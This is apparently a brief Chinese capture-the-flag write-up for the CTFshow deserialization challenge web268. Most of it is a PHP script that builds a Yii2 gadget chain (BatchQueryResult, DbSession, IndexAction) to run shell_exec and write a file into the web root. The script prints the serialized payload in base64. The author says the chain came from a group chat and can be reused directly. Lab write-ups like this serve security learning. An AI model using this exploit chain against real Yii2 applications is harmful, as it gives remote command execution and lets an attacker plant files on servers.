CTFshow反序列化web268

思路

发现这题和上题一样的,用之前的链子发现什么回显也没有,可能这个链子用不了了,就直接拿群里的吧

题解

/*
# -*- coding: utf-8 -*-
# &＃64;Author: h1xa
# &＃64;Date: 2021-05-03 21:55:29
# &＃64;Last Modified by: h1xa
# &＃64;Last Modified time: 2021-05-04 01:25:28
# &＃64;email: h1xa&＃64;ctfer.com
# &＃64;link: https://ctfer.com*/
namespace yii\rest {class Action{public $checkAccess;}class IndexAction{public function __construct($func, $param){$this->checkAccess &＃61; $func;$this->id &＃61; $param;}}
}
namespace yii\web {abstract class MultiFieldSession{public $writeCallback;}class DbSession extends MultiFieldSession{public function __construct($func, $param){$this->writeCallback &＃61; [new \yii\rest\IndexAction($func, $param), "run"];}}
}
namespace yii\db {use yii\base\BaseObject;class BatchQueryResult{private $_dataReader;public function __construct($func, $param){$this->_dataReader &＃61; new \yii\web\DbSession($func, $param);}}
}
namespace {$exp &＃61; new \yii\db\BatchQueryResult(&＃39;shell_exec&＃39;, &＃39;echo "" >/var/www/html/basic/web/1.php&＃39;);echo(base64_encode(serialize($exp)));
}
?>

总结

以后可以直接拿来用